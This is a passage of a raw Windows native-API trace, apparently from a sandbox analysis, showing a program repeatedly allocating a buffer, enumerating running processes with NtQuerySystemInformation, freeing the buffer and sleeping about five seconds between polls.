BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.546] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.555] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.563] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.572] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.582] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.633] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.641] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.650] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.657] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.664] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.671] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.678] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.685] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.691] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.698] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.704] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.711] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.717] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.724] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.731] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.738] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, 